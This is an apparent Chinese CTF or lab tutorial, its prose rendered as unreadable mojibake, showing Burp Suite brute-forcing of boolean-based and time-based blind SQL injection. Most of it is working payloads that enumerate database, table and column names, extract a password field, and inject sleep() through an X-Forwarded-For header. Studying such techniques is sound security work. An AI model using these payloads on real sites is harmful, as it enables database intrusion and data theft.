ÊÕ²ØСվ
burpsuit½ø±¬ÆÆ-booläעºÍʱ¼ä×¢Èë ÏÂÔر¾ÎÄ

×¢ Èë

Ò»¡¢booläע±¬ÆÆ

Ò»£®Êý¾Ý¿â³¤¶È£¬n³¤¶È´øÈëÖµ

username=admin' and (length(database()))=n#&password=1111 4

¶þ£®Êý¾Ý¿âÃû

1. Êý¾Ý¿â {1}£ºµÚ¼¸Î»£¬·¶Î§1-4£¬{2}£ºasciiÂëÊýÖµ,·¶Î§33-126

username=admin'and ascii(substr(database(),{1},1))={2}#&password=1111 test

Èý£®»ñÈ¡±í¸öÊý£¬±í³¤¶È

1. È·¶¨±íµÄ³¤¶È:{1}·¶Î§0-7,{2}:³¤¶È´óС1-20

username=admin'and (select length(table_name) from information_schema.tables where table_schema =database()limit {1},1)={2}#&password=1111 0--------9 1--------4

ËÄ£®»ñÈ¡ÁÐÊý

1. È·¶¨ÁÐÊý: limit 0,1 limit 1,1

username=admin'and (select column_name from information_schema.columns where table_name =0x75736572 and table_schema=database() limit 1,1)>0#&password=1111 È·¶¨ÁÐÊý:2 Î壮»ñÈ¡Á㤶È

1. È·¶¨³¤¶È:{1}·¶Î§0-1,{2}:³¤¶È´óС1-20

username=admin'and (select length(column_name) from information_schema.columns where table_name = 0x75736572 and table_schema=database() limit {1},1)={2}#&password=1111 0--------8 1--------8

Áù£®»ñÈ¡ÁеÄ×ֶΠ£¬±¬ÆÆ

1.ÁеÄ×Ö¶Îlimit 0,1 limit 1,1 £¬ {1}:1-8£¬ {2}£ºasciiÂëÊýÖµ,·¶Î§33-126

username=admin'and ascii(substr((select column_name from information_schema.columns where table_name =0x75736572 and

table_schema=database() limit 1,1),{1},1))={2}#&password=1111 »ñÈ¡ÁÐÃû:username,password

Æߣ®»ñÈ¡password×ֶ㤶È

1. ³¤¶È{1}:asciiÂëÊýÖµ,·¶Î§33-126

username=admin'and (select length(password) 0,1)={1}#&password=1111 13

from test.user limit

°Ë£®»ñÈ¡×Ö¶ÎÄÚÈÝ

1. ×Ö¶ÎÐÅÏ¢£¬{1}£ºµÚ¼¸Î»£¬·¶Î§1-13£¬{2}£ºasciiÂëÊýÖµ,·¶Î§33-126

username=admin'and ascii(substr((select password from test.user limit 0,1),{1},1))={2}#&password=1111 Flag{dkypxzx}

¶þ¡¢Ê±¼ä×¢Èë

1¡¢Öð¸ö²ÂÊý¾Ý¿â --δÑéÖ¤

»ùÓÚʱ¼äµÄäע

http://www.any.com:88/sqli/Less-9/?id=1' and sleep( if(ascii(substr(database(),1,1))<116,0,5 )) # Èç¹ûµÈºÅ±ð¹ËÂǵô£¬¿ÉÒÔʹÓÃ< »òÕß> 2¡¢Ê±¼ääע

http://ctf5.shiyanbar.com/web/wonderkun/index.php

ÌâÄ¿Ìáʾ£ºÎÒÒª°Ñ¹¥»÷ÎÒµÄÈ˶¼¼Ç¼dbÖÐÈ¥!£¬Ôò¿ÉºÜÓпÉÄÜÊÇ×¢ÈëÌ⡣ͨ¹ý²âÊÔ¹ý³Ì·¢ÏÖ£¬·´À¡½á¹ûΪX-Forwarded-ForÊäÈëµÄÄÚÈÝ£¬Ôò²Â²âΪhttpÍ·ÎļþµÄ×¢Èë¡£

ÕâÀàÌáÐÑÒ»°ã²Â²â»áÓбíflag£¬ÓÐflagÁÐ ±¬ÆÆÁеij¤¶È£¬Responseʱ¼ä³¬¹ý5sµÄÊýֵΪ³¤¶È£¨ÆäÖÐÈô³¤¶È³¬¹ý¹Ì¶¨³¤¶È£¬·µ»Øʱ¼äÒ²»á³¬¹ý5s£¬²Â²âΪÒç³öµÄÔ­Òò£¬È¡payload×îСµÄÖµÇÒʱ¼ä³¬¹ý5s£© 1. ±¬flagÁеij¤¶È

X-Forwarded-For: 1' and (select case when (select length(flag) from flag limit 1)=¡ì32¡ì then sleep(5) else 1 end) and '1'='1 2.±¬ÁеÄÿλµÄasciiÖµ

X-Forwarded-For:1' and (select case when (select ord (substring(flag from ¡ì{1}¡ì for 1 )) from flag limit 1)=¡ì{2}¡ì then sleep(5) else 1 end ) and '1'='1

µÃµ½flag×Ö·û´®

WordÎĵµÏÂÔØ£ºburpsuit½ø±¬ÆÆ-booläעºÍʱ¼ä×¢Èë.doc
ËÑË÷¸ü¶à:burpsuit½ø±¬ÆÆ-booläעºÍʱ¼ä×¢Èë


×îÐÂä¯ÀÀ


ÈÈÃÅä¯ÀÀ
All rights reserved Powered by ÄϾ©Áλª´ð°¸Íø¡¡
×ÊÁÏÀ´×Ô»¥ÁªÍø£¬ ÓÐÈκÎÒÉÎÊ£¬ÇëÁªÏµ¿Í·þ£º779662525☒qq.com ËÕICP±¸20003344ºÅ-2